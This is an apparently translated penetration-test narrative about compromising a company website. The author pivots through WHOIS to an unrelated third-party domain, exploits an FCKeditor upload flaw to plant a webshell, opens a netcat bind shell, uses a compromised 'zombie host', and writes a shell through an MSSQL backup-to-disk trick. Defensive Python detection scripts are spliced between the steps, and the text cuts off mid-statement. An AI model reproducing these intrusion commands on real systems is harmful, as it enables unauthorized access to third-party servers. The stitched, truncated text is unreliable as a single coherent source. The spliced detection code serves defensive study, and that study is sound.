Author: 814ckhum0r
1. Overall Approach:
The target website's server had ASP script mapping disabled, so an ASP webshell could not be executed. The domain's registration record gave the technical administrator's mailbox, and a reverse lookup on that mailbox showed it had also registered another domain, cdxxx.cn. Using the second FCKeditor upload vulnerability, that website (cdxxx.cn) was compromised and a webshell obtained. The IIS configuration on that server (cdxxx.cn) still contained an entry for the target website. Privilege escalation there failed, so an MSSQL account with dbo rights for one of the sites on that server was used to execute SQL statements that backed up a script Trojan into the target site's web directory on that server (cdxxx.cn); viewing that site's config file then gave the password of the target website's database connection account. That password connected successfully to the target server's database, where the role was also dbo. An ASPX "pony" (small shell) was backed up into the target site's directory and privileges were then escalated. In this way the website and the server were fully compromised.
2. Detailed Process
Recently, while I was still a graduate student, a leader at the company asked me to take a look at the security of the company's website and report back as soon as possible. This test left me stuck several times, so I decided to write it down for readers.
Preliminary information gathering showed the target server environment to be Win2003 + IIS6.0 + ASP.NET + MSSQL 2000,
with IP address 221.xxx.77.1. The website appeared to have been outsourced to a company. First I tried SQL injection: I went through the main site and found only a few pages with parameters, none of them injectable. I scanned with wwwscan, WebCruiser and Acunetix WVS, and none turned up anything usable. Registering a user at the front end, the system prompted for a referrer, and none could be found at the moment, so, thinking I would first try a stock account, I tried logging into the front end with username "test" and password "test", which worked. I then looked for a place to upload. I uploaded a normal picture in the avatar upload area, refreshed, and viewed the image properties to get its address (Figure 1):
It showed the username test, but the avatar address returned a 404 error, so that was the first setback.
Checking the IP address, there were three domains on the server: the main site, a subdomain, and an unrelated site. Google turned up several second-level domains. Scanning one subdomain with wwwscan found fckeditor under its root directory. I tried the second FCKeditor upload vulnerability and successfully uploaded a picture Trojan, but it would not execute: the second setback. I estimated that the ASP application extension had been disabled in IIS and only ASPX was left. I then tried the fckeditor on every second-level domain of the site, and none of the uploads would execute. The unrelated site was tested as well; nothing was usable. A lot of time went into this fruitless work. I wanted to give up and report to the leadership that there was no problem, but when it was time to leave I still had not reported. I got on my bicycle and went home, thinking it over on the way; I still did not think it was doable, so I thought about how to proceed. After dinner at home I opened my junk notebook and carried on.
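A defender-side check for the FCKeditor activity described above, added here as an example and not part of the original post. It parses IIS 6 W3C extended log lines and flags two things: connector requests whose Command creates files or folders, and any request for a script-mapped file under an upload directory. The log lines are constructed, and the upload directories, the connector path fragment and the extension list are assumptions to adjust per site.

```python
import re
from urllib.parse import parse_qs

# Assumed upload roots for this site (adjust to the real ones); FCKeditor's default is /userfiles/.
UPLOAD_DIRS = ("/userfiles/", "/images/")
CONNECTOR_MARK = "/filemanager/connectors/"      # FCKeditor connector path fragment
WRITE_COMMANDS = {"fileupload", "createfolder"}   # connector commands that create files or folders
# Extensions IIS 6 hands to a script engine; checked in every path segment, not only the filename.
SCRIPT_EXT = re.compile(r"\.(aspx?|asa|ashx|cer)(?![a-z0-9])", re.I)

# Constructed IIS 6 W3C log sample (not the author's logs); hosts, paths and IPs are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2010-05-12 09:01:10 10.0.0.5 GET /index.aspx - 80 - 203.0.113.7 Mozilla/4.0 200
2010-05-12 09:01:55 10.0.0.5 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFolders&Type=File&CurrentFolder=/ 80 - 203.0.113.7 Mozilla/4.0 200
2010-05-12 09:02:03 10.0.0.5 POST /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=FileUpload&Type=Image&CurrentFolder=/ 80 - 203.0.113.7 Mozilla/4.0 200
2010-05-12 09:02:20 10.0.0.5 GET /userfiles/image/a.aspx - 80 - 203.0.113.7 Mozilla/4.0 200
2010-05-12 09:03:00 10.0.0.5 GET /userfiles/image/photo.jpg - 80 - 198.51.100.9 Mozilla/4.0 200
"""


def parse_w3c(text):
    """Yield one dict per request line, using the #Fields header for column names."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign the columns
        yield dict(zip(fields, values))


def classify(rec):
    """Return a rule name if the request matches one of the two checks, else None."""
    path = rec.get("cs-uri-stem", "")
    query = rec.get("cs-uri-query", "-")
    if CONNECTOR_MARK in path.lower():
        cmd = parse_qs("" if query == "-" else query).get("Command", [""])[0].lower()
        if cmd in WRITE_COMMANDS:
            return "fckeditor-write-command"
    if path.lower().startswith(UPLOAD_DIRS):
        for seg in path.split("/"):
            if SCRIPT_EXT.search(seg):
                return "script-under-upload-dir"
    return None


def scan_iis_log(text):
    """Return the alerts raised over the whole log, in log order."""
    alerts = []
    for rec in parse_w3c(text):
        rule = classify(rec)
        if rule:
            alerts.append({
                "rule": rule,
                "client": rec.get("c-ip"),
                "method": rec.get("cs-method"),
                "path": rec["cs-uri-stem"],
                "status": rec.get("sc-status"),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_iis_log(SAMPLE_LOG):
        print(alert)
```

Removing the .asp script mapping, as the target server had done, only stops uploaded ASP files from running; the check above catches the upload request itself and any script-mapped extension that is still enabled, so it does not depend on which engine is left configured.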
Querying the target domain through WHOIS gave the registration email, Email: Arcaixxx@163.com. A reverse lookup on that mailbox showed it had also registered the domain mapxxx.cn (IP: 124.17x.x.x.40) (Figure 2):
I tried to access this domain and found that the website would not open. Searching the mailbox on Google gave the registered company name; searching that company name on Google gave another domain, cdxxx.cn (IP: 124.17x.x.40), which could be accessed normally (Figure 3):
A preliminary look at this website showed that the search function had an injection vulnerability, but it was troublesome to exploit, so I put it aside for the moment. Posting on the forum, I found fckeditor (Figure 4):
This time I did not hold out much hope. I tried the second upload vulnerability, got a Trojan up (Figure 5), and wrote aspxspy into it to get a webshell:
(Conclusion: when you look forward to results, you are always disappointed; when you expect nothing, you get a surprise.) The IISSpy function of the webshell showed the target website's information: the company had not deleted it after the website was migrated (Figure 6):
I immediately ran notepad c:\windows\system32\drivers\etc\hosts to point the target website's domain at this server (IP: 124.17x.x.40), then ran ipconfig /flushdns and reopened the browser to access the domain. The site turned out to be configured manually, which did not look secure. Attempts to switch into its directory failed, as did several other web directories, which was expected. The C drive could list directories, but one subdirectory could not be read, and the other partitions could not be read at all. I tried blood sword's darkblade tool to brute-force directory names. Fortunately the temp folder was writable, readable and executable. After uploading cmd.exe to the cookies directory, I tried 360, churrasco ("Brazilian barbecue") and Serv-U (su), and then other privilege escalation programs; all failed. Listing directories with commands gave no response either; some passwords found in IISSpy could not connect to MSSQL or Serv-U; even many of the system's own commands did not work, and the registry was no use. The intrusion had reached a dead end, and it was very late. Looking out the window, the night was quiet; everyone was asleep, and only I and my computer, with its fan noise, were still "working". My brain told me it was time to rest, so I put on two pieces of light music, washed up and went to bed.
On the way to work the next day it suddenly occurred to me that the ASP application extension should not be disabled for the target site on the original server, so I could try the FCKeditor upload vulnerability again. I could not wait to try it once I reached the company. The result: connector.aspx always returned a 500 error and nothing could be uploaded. Another setback. After thinking it over for a while: with the web account and password of the target site, I could try copying the webshell into the target site's directory with a runas-style command. So I found two third-party command-line tools similar to runas on the Internet (if this is unclear, search for "lsrunas" and "runas.exe without entering the password interactively"). I downloaded one, renamed it runas1.exe and uploaded it, then uploaded an ASPX Trojan to c:\windows\temp\cookies\a.aspx and executed in the webshell: "runas1.exe /user:webuser c:\windows\temp\cookies\cmd.exe /c copy c:\windows\temp\cookies\a.aspx d:\wwwroot\www.tianxxxx.com\wwwroot\images webpass" (note: webuser is the web account and webpass is its password). There was no response, so I uploaded nc.exe and wrote a batch file in the webshell containing nc -l -vv -p 8484 -e c:\windows\temp\cookies\cmd.exe. I then connected by Remote Desktop to a zombie host and ran nc.exe 124.172.x.x 8484 to get a shell; this shell also inherits the web account's permissions. In that shell I ran cd c:\windows\temp\cookies to switch to that directory and ran runas1.exe /user:username command.exe password again. Testing showed that only exe programs could be run this way: for a batch file, even with the absolute path given, the system prompted that the path could not be found. So I wrote a small VB program to copy the file.
Private Sub Form_Load()
    ' VB6: copy the uploaded file into the target site's images directory
    FileCopy "c:\windows\temp\cookies\a.aspx", "d:\wwwroot\www.xuehi.com\wwwroot\images\a.aspx"
End Sub
After generating the exe, I uploaded it as c:\windows\temp\cookies\copy1.exe and ran runas1.exe /user:webuser copy1.exe webpass. The prompt said copy1.exe had been executed as webuser. To check the process list I ran tasklist, which prompted that tasklist is not recognized as an internal or external command or runnable program; other common commands behaved the same, which I estimated to be an environment variable problem. I uploaded several common command tools to c:\windows\temp\cookies and then ran tasklist.exe in the shell: copy1.exe had indeed been created, but accessing a.aspx still gave a 404 page.
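The commands above (cmd.exe launched from the webshell, nc.exe run from a scratch directory with -l and -e, runas-style tools run as the web account) all leave process-creation traces. The following is an added example, not part of the original post, of triaging such events from a defender's side. The events are constructed in the field shape Sysmon event 1 uses (Image, ParentImage, CommandLine, User); the worker-process names, scratch directories and compiler allowlist are assumptions.

```python
from pathlib import PureWindowsPath

# IIS worker processes; a child of these is normally only the ASP.NET compiler.
WEB_WORKERS = {"w3wp.exe", "aspnet_wp.exe"}
COMPILER_ALLOWLIST = {"csc.exe", "vbc.exe", "cvtres.exe"}   # legitimate dynamic-compile children
# Directories a web account can often write to but should never execute from (assumed list).
SCRATCH_DIRS = ("\\temp\\", "\\tmp\\", "\\cookies\\", "\\inetpub\\wwwroot\\")

# Constructed events (not real telemetry); paths and users are made up for the example.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\WINDOWS\system32\svchost.exe",
     "CommandLine": "w3wp.exe -ap DefaultAppPool", "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"Image": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "ParentImage": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths", "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"Image": r"C:\WINDOWS\system32\cmd.exe",
     "ParentImage": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c dir c:\\", "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"Image": r"C:\WINDOWS\Temp\cookies\nc.exe",
     "ParentImage": r"C:\WINDOWS\Temp\cookies\cmd.exe",
     "CommandLine": "nc.exe -l -vv -p 8484 -e c:\\windows\\temp\\cookies\\cmd.exe",
     "User": r"NT AUTHORITY\NETWORK SERVICE"},
    {"Image": r"C:\WINDOWS\notepad.exe",
     "ParentImage": r"C:\WINDOWS\explorer.exe",
     "CommandLine": "notepad.exe notes.txt", "User": r"HOST\admin"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def triage_event(ev):
    """Return the list of rule names the event matches (empty if none)."""
    rules = []
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmdline = ev.get("CommandLine", "")

    # 1. A web worker spawning anything but the compiler is a strong webshell signal.
    if basename(parent) in WEB_WORKERS and basename(image) not in COMPILER_ALLOWLIST:
        rules.append("web-worker-spawned-process")

    # 2. Executables started from temp/cookies/web-root style directories.
    image_low = image.lower().replace("/", "\\")
    if any(d in image_low for d in SCRATCH_DIRS):
        rules.append("execution-from-scratch-dir")

    # 3. netcat-style listener that hands a program to the connecting peer (-l plus -e).
    toks = cmdline.lower().split()
    if "-e" in toks and any(t.startswith("-l") for t in toks):
        rules.append("netcat-style-bind-shell")

    return rules


def triage(events):
    """Keep only events that matched at least one rule, preserving input order."""
    hits = []
    for ev in events:
        rules = triage_event(ev)
        if rules:
            hits.append({"image": ev.get("Image"), "user": ev.get("User"), "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The compiler allowlist matters in practice: ASP.NET on IIS 6 really does launch csc.exe from w3wp.exe when it compiles pages, so a rule that alerts on every child of the worker process drowns in noise and gets switched off.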
After fiddling for what felt like ages with no progress, it was the noon break. After lunch with colleagues I took a nap in the office, then woke up and carried on. Going one by one through the directories that could be entered in aspxspy's IISSpy, I did find a Discuz!NT site. Going straight into its web directory and viewing DNT.config gave an MSSQL account (Figure 7):
Connecting with aspxspy's database function showed public permission (Figure 8):
Although it was only public, I still held out a glimmer of hope and executed a backup statement to write a one-line ASP Trojan into the site's directory. The current user only had permissions on the xxxxbbs database, so the complete statement was as follows: alter database xxxxbbs set recovery full; create table cmd (a image); backup log xxxxbbs to disk = c:\windows\temp\cookies\m2 with init; insert into c
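The backup-to-disk trick above only works because the account can run BACKUP and the destination path is unconstrained. As an added example, not part of the original post, here is an audit that a DBA could run over captured T-SQL batches (Profiler trace or audit log) to flag BACKUP statements whose destination is outside the approved backup directory or lacks a backup file extension, and that reports recovery-model changes, together with a check for application accounts sitting in db_owner. The batches, role rows and approved directory are constructed assumptions.

```python
import re

# Approved backup destination (assumption; adjust to the real one). Compared case-insensitively.
ALLOWED_BACKUP_DIR = "d:\\sqlbackup\\"
OK_EXT = {".bak", ".trn", ".dif"}

BACKUP_RE = re.compile(
    r"\bbackup\s+(log|database)\s+(\[?[\w.]+\]?)\s+to\s+disk\s*=\s*(?:N?'([^']*)'|(\S+))",
    re.I)
RECOVERY_RE = re.compile(
    r"\balter\s+database\s+(\[?[\w.]+\]?)\s+set\s+recovery\s+(full|bulk_logged|simple)", re.I)

# Constructed batches, as a trace would capture them (not from the original post).
SAMPLE_BATCHES = [
    "BACKUP DATABASE sales TO DISK = 'D:\\SQLBackup\\sales_full.bak' WITH INIT",
    "alter database xxxxbbs set recovery full",
    "create table cmd (a image)",
    "backup log xxxxbbs to disk = 'c:\\inetpub\\wwwroot\\images\\m2.asp' with init",
    "BACKUP LOG sales TO DISK = N'D:\\SQLBackup\\sales_20100512.trn'",
]

# Constructed (role, member) rows, e.g. from sp_helpuser on SQL Server 2000 or
# sys.database_role_members joined to sys.database_principals on later versions.
SAMPLE_ROLE_ROWS = [("db_owner", "dbo"), ("db_owner", "bbsuser"), ("db_datareader", "webuser")]


def check_destination(path):
    """Return the reasons a backup destination is unacceptable (empty list if it is fine)."""
    p = path.replace("/", "\\").strip().lower()
    reasons = []
    if not p.startswith(ALLOWED_BACKUP_DIR.lower()):
        reasons.append("destination outside approved backup directory")
    fname = p.rsplit("\\", 1)[-1]
    ext = fname[fname.rfind("."):] if "." in fname else ""
    if ext not in OK_EXT:
        reasons.append("unexpected or missing file extension %r" % ext)
    return reasons


def audit_batches(batches):
    """One finding per offending BACKUP statement (high) and per recovery-model change (info)."""
    findings = []
    for i, sql in enumerate(batches):
        for m in BACKUP_RE.finditer(sql):
            kind, db, quoted, bare = m.groups()
            path = quoted if quoted is not None else bare
            reasons = check_destination(path)
            if reasons:
                findings.append({"batch": i, "severity": "high", "kind": kind.lower(),
                                 "db": db.strip("[]"), "path": path, "reasons": reasons})
        for m in RECOVERY_RE.finditer(sql):
            findings.append({"batch": i, "severity": "info", "kind": "recovery-model",
                             "db": m.group(1).strip("[]"), "path": None,
                             "reasons": ["recovery model set to " + m.group(2).lower()]})
    return findings


def app_accounts_in_db_owner(role_rows, builtin=("dbo",)):
    """Members of db_owner other than the built-in dbo user: candidates for least-privilege cleanup."""
    return sorted(m for role, m in role_rows
                  if role.lower() == "db_owner" and m.lower() not in builtin)


if __name__ == "__main__":
    for f in audit_batches(SAMPLE_BATCHES):
        print(f)
    print("app accounts in db_owner:", app_accounts_in_db_owner(SAMPLE_ROLE_ROWS))
```

A recovery-model switch is routine on its own, which is why it is reported as info; it becomes interesting when a log backup to a web-root path follows it in the same session, as in the statement the author ran.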